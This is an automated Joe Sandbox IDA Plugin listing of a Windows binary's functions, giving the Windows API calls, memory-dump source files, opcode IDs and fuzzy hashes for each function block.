                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                        • Opcode ID: 96c51f2ed0ee279628b850a082cc8882aa8e1692e89b383a0f9cb0ca0da417d5
                                                                                                                        • Instruction ID: e8de00a249552ea13bf945132f6572779d3c6e19454bace36912a29e978b84ff
                                                                                                                        • Opcode Fuzzy Hash: 96c51f2ed0ee279628b850a082cc8882aa8e1692e89b383a0f9cb0ca0da417d5
                                                                                                                        • Instruction Fuzzy Hash: 14014C72A54A456BF738D676DC5ABBA7258EB00F67F340025FC46D60C3D9950C806291
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FF65EF
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF65FE
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF661A
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00FF6629
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6643
                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00FF6657
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279440585-0
                                                                                                                        • Opcode ID: d2670836ba16708bb743d1c3155ff8e2febf470d3d2c7ec3cf8da8842b2a99c3
                                                                                                                        • Instruction ID: 2ffc8fd4183cd8bb9e39f8ef1d1e7ff7a0185f00cb4cb5b6489fc7df7270335a
                                                                                                                        • Opcode Fuzzy Hash: d2670836ba16708bb743d1c3155ff8e2febf470d3d2c7ec3cf8da8842b2a99c3
                                                                                                                        • Instruction Fuzzy Hash: E021D2316002159FCB20EF64CC89B7EB7A9EF44720F148159EA5AEB3D1CB78AD05EB51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA0FF6: std::exception::exception.LIBCMT ref: 00FA102C
                                                                                                                          • Part of subcall function 00FA0FF6: __CxxThrowException@8.LIBCMT ref: 00FA1041
                                                                                                                        • _memmove.LIBCMT ref: 00FD062F
                                                                                                                        • _memmove.LIBCMT ref: 00FD0744
                                                                                                                        • _memmove.LIBCMT ref: 00FD07EB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1300846289-0
                                                                                                                        • Opcode ID: 874513e6aa40ca21066ec8ed2315483900ba1d00dc3176d741b9d89ca1f4bf6a
                                                                                                                        • Instruction ID: 412d1f797c60f9007e5eb203a9761b4cf0c4011fa1570f0a22e1dcf58d41898f
                                                                                                                        • Opcode Fuzzy Hash: 874513e6aa40ca21066ec8ed2315483900ba1d00dc3176d741b9d89ca1f4bf6a
                                                                                                                        • Instruction Fuzzy Hash: B1028EB1E00209DFDF04DF64D981AAEBBB5EF44310F18806AE806DB355EB35DA51EB91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F819FA
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F81A4E
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00F81A61
                                                                                                                          • Part of subcall function 00F81290: DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorProc$LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3744519093-0
                                                                                                                        • Opcode ID: f8467549b3a5c6137ffb17c25f24af483796326176ac60e8f36202facb84bcf9
                                                                                                                        • Instruction ID: ee778d245b11af4ceceb759a90b8807204b1181a68e1a48dc43455250c57c41f
                                                                                                                        • Opcode Fuzzy Hash: f8467549b3a5c6137ffb17c25f24af483796326176ac60e8f36202facb84bcf9
                                                                                                                        • Instruction Fuzzy Hash: 91A127B2505546BAEA3DBA29CC84EFB369CFB82361F14030AF442D61C5DA5E9D03B771
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FF80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00FF80CB
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FF6AB1
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6ADA
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF6B13
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6B20
                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00FF6B34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 99427753-0
                                                                                                                        • Opcode ID: a60e1074fcc6411fdce0974315d64cdfb36a290569f023945398b5c285f4e291
                                                                                                                        • Instruction ID: 6ff5f113a59c9195da5f35c81f9efc7de29c231b7af6b409e49a04f30aec4957
                                                                                                                        • Opcode Fuzzy Hash: a60e1074fcc6411fdce0974315d64cdfb36a290569f023945398b5c285f4e291
                                                                                                                        • Instruction Fuzzy Hash: 5E41E635700214AFEB10BF64DC86FBE77A59F44710F448058FA5AEB3D2DA785D01A791
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 292994002-0
                                                                                                                        • Opcode ID: bfe15b582aa618d2f301b17f9b0b9221b74b4ad3bd62df779989e14dafb6442f
                                                                                                                        • Instruction ID: 74a79d4ce1d5996c24b3c32a30336c9a573c2ef4384fde577f2413131ea9bb8e
                                                                                                                        • Opcode Fuzzy Hash: bfe15b582aa618d2f301b17f9b0b9221b74b4ad3bd62df779989e14dafb6442f
                                                                                                                        • Instruction Fuzzy Hash: 3E11BF313006116FF7336F2AEC44A6FBB9DEF48721F044429E986D7281CB7999029FA5
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC1D88,?), ref: 00FFC312
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFC324
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                        • Opcode ID: 809dd5ea2524d1edac4d2b6c90fb836cc43ca98eab96bb30a9a59a07f2d5210b
                                                                                                                        • Instruction ID: fbf338788ff76f4d5689a71aa6fe8e308b643e30219c75afa007aed0ba661202
                                                                                                                        • Opcode Fuzzy Hash: 809dd5ea2524d1edac4d2b6c90fb836cc43ca98eab96bb30a9a59a07f2d5210b
                                                                                                                        • Instruction Fuzzy Hash: 47E08C74A0072B8FDB314B2AC414AD676D8EF093A4F808429E9C5D6220E7B4D840EBA0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 674341424-0
                                                                                                                        • Opcode ID: 1f3860631286fa904bafba49d9fb9b16d59f9f22c4d30986a82fd6668a5c8faa
                                                                                                                        • Instruction ID: 39f7f50d54b673eb8631dd7e026ef667fc0df2727479ca9e5d4dada3e03c256a
                                                                                                                        • Opcode Fuzzy Hash: 1f3860631286fa904bafba49d9fb9b16d59f9f22c4d30986a82fd6668a5c8faa
                                                                                                                        • Instruction Fuzzy Hash: 0122AD715083029FDB24EF24C881BAFB7E4BF88714F14491DF49A97291DB75EA04EB92
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00FFF151
                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00FFF15F
                                                                                                                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00FFF21F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00FFF22E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2576544623-0
                                                                                                                        • Opcode ID: a110ecfc3889a0a649fa278c2b18ae0f4c0870ee9a7a0a5f077c2f49263bee0d
                                                                                                                        • Instruction ID: 698e364cb70938b2a30caff639c9d38b583345349b2ffb69c7cc8069ff711c24
                                                                                                                        • Opcode Fuzzy Hash: a110ecfc3889a0a649fa278c2b18ae0f4c0870ee9a7a0a5f077c2f49263bee0d
                                                                                                                        • Instruction Fuzzy Hash: 92518E715083019FD320EF20DC85AABB7E8FF94B10F54482DF596972A1EB74E908DB92
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00FE40D1
                                                                                                                        • _memset.LIBCMT ref: 00FE40F2
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00FE4144
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FE414D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157408455-0
                                                                                                                        • Opcode ID: ff0e8d735a07c4d9581fd6d23e00a2c5b4a5771e4419b89372d258e1d2e375d5
                                                                                                                        • Instruction ID: 0c248a3602ce1896c95342fd082d96adb3cbe60137cd7c3f9bf4ea378cfd50b5
                                                                                                                        • Opcode Fuzzy Hash: ff0e8d735a07c4d9581fd6d23e00a2c5b4a5771e4419b89372d258e1d2e375d5
                                                                                                                        • Instruction Fuzzy Hash: 0511A775D012287AD7309BA5AC4DFABBB7CEF45760F10419AF908D7180D6745E809BA4
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FDEB19
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($|
                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                        • Opcode ID: 45659235c46b34f8163fa5ecdde1a42badea48f1354d7714565759704fa574cd
                                                                                                                        • Instruction ID: a44aac6b10d5bf8650585d625ef11da65376b1f3bc8e550e06e19c5730aa7329
                                                                                                                        • Opcode Fuzzy Hash: 45659235c46b34f8163fa5ecdde1a42badea48f1354d7714565759704fa574cd
                                                                                                                        • Instruction Fuzzy Hash: 29323675A007059FDB28DF19C481A6AB7F1FF48320B15C56EE89ADB3A1EB70E941DB40
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FF1AFE,00000000), ref: 00FF26D5
                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FF270C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 599397726-0
                                                                                                                        • Opcode ID: 9971d79fe90bd5f2842d5f7a8e5644a71816a6bc968122872c4702f87f6b386f
                                                                                                                        • Instruction ID: f8751045c910bfc4563bbc65d7b2b16b8e0ea391cf809fa7d87b512fb3d5acef
                                                                                                                        • Opcode Fuzzy Hash: 9971d79fe90bd5f2842d5f7a8e5644a71816a6bc968122872c4702f87f6b386f
                                                                                                                        • Instruction Fuzzy Hash: E341D27290020DBFEB60EE54CC85EBBB7ACEF40724F10406AFB05E6150EA75AE41B665
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB5AE
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FEB608
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FEB655
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: 1a300a175d647e48cff515d71215476f78ce200ff3639947e516dc25f3eda6f3
                                                                                                                        • Instruction ID: bdd5ff0406bff7bf24c02515b762b415292b0336e2429d45f53868b167026a18
                                                                                                                        • Opcode Fuzzy Hash: 1a300a175d647e48cff515d71215476f78ce200ff3639947e516dc25f3eda6f3
                                                                                                                        • Instruction Fuzzy Hash: 2D216035A00518EFCB00EFA5D884AEEBBB8FF49310F148099E845AB351DB35A916DB51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA0FF6: std::exception::exception.LIBCMT ref: 00FA102C
                                                                                                                          • Part of subcall function 00FA0FF6: __CxxThrowException@8.LIBCMT ref: 00FA1041
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8D0D
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8D3A
                                                                                                                        • GetLastError.KERNEL32 ref: 00FD8D47
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1922334811-0
                                                                                                                        • Opcode ID: d79ecb7d53ab19b9294acbfa1fd14542f1e110aeca396a567f15831fec492b28
                                                                                                                        • Instruction ID: 637ea1fd2b814daf6c2faef1e7831267daa3e5cb287394f5f4923ea9596daa5c
                                                                                                                        • Opcode Fuzzy Hash: d79ecb7d53ab19b9294acbfa1fd14542f1e110aeca396a567f15831fec492b28
                                                                                                                        • Instruction Fuzzy Hash: 5111C1B1814209AFE728EF54EC85D6BB7BDFB04760B24852EF45693240EF30BC419B20
                                                                                                                        APIs
                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FE4C2C
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FE4C43
                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00FE4C53
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3429775523-0
                                                                                                                        • Opcode ID: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                                                                                                                        • Instruction ID: 7769be18b6ffa438d19b3a43c0f1f27741a81d47bbb59243641a2114f89076fb
                                                                                                                        • Opcode Fuzzy Hash: 1da4f322106c95918c34a558b86b60f29f86fa13a572a211e6e9f89f78be1f26
                                                                                                                        • Instruction Fuzzy Hash: F6F04975A1130DBFDF14DFF4D889AAEBBBCEF08211F1044A9A901E2180E6756A049B50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9bcda06cdd6dfa4e1999e0d6056aa9065ab4c931b1f1daaabb68e14020c6ce05
                                                                                                                        • Instruction ID: 036d5e17c881e387091cef9b945c8caf8e554097597f9632846888efd1680f2c
                                                                                                                        • Opcode Fuzzy Hash: 9bcda06cdd6dfa4e1999e0d6056aa9065ab4c931b1f1daaabb68e14020c6ce05
                                                                                                                        • Instruction Fuzzy Hash: 47229B75E00216CFDB24EF54C985BEABBB0FF09310F148069E856AB341E774AD85EB91
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00FEC966
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00FEC996
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
